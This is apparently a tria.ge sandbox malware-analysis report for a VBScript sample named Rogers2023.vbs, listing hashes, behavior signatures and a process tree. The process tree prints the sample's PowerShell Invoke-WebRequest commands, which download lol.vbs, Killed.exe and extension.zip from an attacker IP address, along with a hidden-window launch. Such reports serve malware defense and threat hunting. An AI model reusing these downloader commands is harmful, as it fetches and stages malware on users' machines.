Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
28/01/2024, 12:45
Static task
static1
Behavioral task
behavioral1
Sample
Rogers2023.vbs
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Rogers2023.vbs
Resource
win10v2004-20231215-en
General
-
Target
Rogers2023.vbs
-
Size
1KB
-
MD5
7c86b22fd57b3992e3750c3e66dfe9eb
-
SHA1
306b70d36f32ff0d03e51159503c50f31e584cd9
-
SHA256
531608d352c2959e768c8dbdb56e7a712986a51d946c9ab90733429ed12534d2
-
SHA512
4b86347aff80553988748e3e4bc457eafd552f27cc438623eddfcf387290f4b43d3aeb55e4e03e82472cff195946f573a7edca367a35441f640caa2ef9a1631f
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 1940 timeout.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2704 powershell.exe 2640 powershell.exe 2628 powershell.exe 1708 powershell.exe 2728 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2704 powershell.exe Token: SeDebugPrivilege 2640 powershell.exe Token: SeDebugPrivilege 2628 powershell.exe Token: SeDebugPrivilege 1708 powershell.exe Token: SeDebugPrivilege 2728 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2128 wrote to memory of 112 2128 WScript.exe 29 PID 2128 wrote to memory of 112 2128 WScript.exe 29 PID 2128 wrote to memory of 112 2128 WScript.exe 29 PID 112 wrote to memory of 2704 112 cmd.exe 30 PID 112 wrote to memory of 2704 112 cmd.exe 30 PID 112 wrote to memory of 2704 112 cmd.exe 30 PID 112 wrote to memory of 2732 112 cmd.exe 40 PID 112 wrote to memory of 2732 112 cmd.exe 40 PID 112 wrote to memory of 2732 112 cmd.exe 40 PID 2732 wrote to memory of 2728 2732 cmd.exe 39 PID 2732 wrote to memory of 2728 2732 cmd.exe 39 PID 2732 wrote to memory of 2728 2732 cmd.exe 39 PID 112 wrote to memory of 2956 112 cmd.exe 37 PID 112 wrote to memory of 2956 112 cmd.exe 37 PID 112 wrote to memory of 2956 112 cmd.exe 37 PID 2956 wrote to memory of 1708 2956 cmd.exe 36 PID 2956 wrote to memory of 1708 2956 cmd.exe 36 PID 2956 wrote to memory of 1708 2956 cmd.exe 36 PID 112 wrote to memory of 2872 112 cmd.exe 34 PID 112 wrote to memory of 2872 112 cmd.exe 34 PID 112 wrote to memory of 2872 112 cmd.exe 34 PID 2872 wrote to memory of 2628 2872 cmd.exe 33 PID 2872 wrote to memory of 2628 2872 cmd.exe 33 PID 2872 wrote to memory of 2628 2872 cmd.exe 33 PID 112 wrote to memory of 2640 112 cmd.exe 31 PID 112 wrote to memory of 2640 112 cmd.exe 31 PID 112 wrote to memory of 2640 112 cmd.exe 31 PID 112 wrote to memory of 1940 112 cmd.exe 41 PID 112 wrote to memory of 1940 112 cmd.exe 41 PID 112 wrote to memory of 1940 112 cmd.exe 41
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rogers2023.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\System32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temparchivo.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -window hidden -command ""3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Expand-Archive extension.zip -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\lol'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Windows\system32\cmd.execmd /c start /min "" powershell -c "Invoke-WebRequest -Uri 'http://66.225.254.211/lol.vbs' -OutFile 'C:\Users\Admin\AppData\Local\Temp\lol.vbs'"3⤵
- Suspicious use of WriteProcessMemory
PID:2872
-
-
C:\Windows\system32\cmd.execmd /c start /min "" powershell -c "Invoke-WebRequest -Uri 'http://66.225.254.211/Killed.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Killed.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2956
-
-
C:\Windows\system32\cmd.execmd /c start /min "" powershell -c "Invoke-WebRequest -Uri 'http://66.225.254.211/extension.zip' -OutFile 'C:\Users\Admin\AppData\Local\Temp\extension.zip'"3⤵
- Suspicious use of WriteProcessMemory
PID:2732
-
-
C:\Windows\system32\timeout.exetimeout 53⤵
- Delays execution with timeout.exe
PID:1940
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Invoke-WebRequest -Uri 'http://66.225.254.211/lol.vbs' -OutFile 'C:\Users\Admin\AppData\Local\Temp\lol.vbs'"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Invoke-WebRequest -Uri 'http://66.225.254.211/Killed.exe' -OutFile 'C:\Users\Admin\AppData\Local\Temp\Killed.exe'"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "Invoke-WebRequest -Uri 'http://66.225.254.211/extension.zip' -OutFile 'C:\Users\Admin\AppData\Local\Temp\extension.zip'"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
742B
MD5884a4151bebdb66d4bb46d61bdc5573f
SHA1641322b21c9ec4726d3fce44b07a4e520b92182d
SHA2562bdffc8de65d8e35469bdc6fd32554b7941e46430f7ff63ec5497e8f5eac2725
SHA512ec75247563e24030ff8f3811b33067bd47efa09ed56f41d4ff3871566ae9afbf2bccdc88f90d825db64911aa19dd33cf509dc43f127b08e252bd5eddae00191e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5b71769ec707f6416f2862f0f3f980f26
SHA1e801fe0fa1c265d421acb470f870ec515a069e45
SHA2564eab243b9ce6058cdec495457eecb84324ab7d7ff02c48284a4a18d0271ad2ac
SHA512e4689e5ca8ef864468d56a5a770e297330530d7857b16212f3c2b4f052437232c7ecdcdc78ae415ec7612f90c04828cd83a201b1e512748b10aeed09bc701057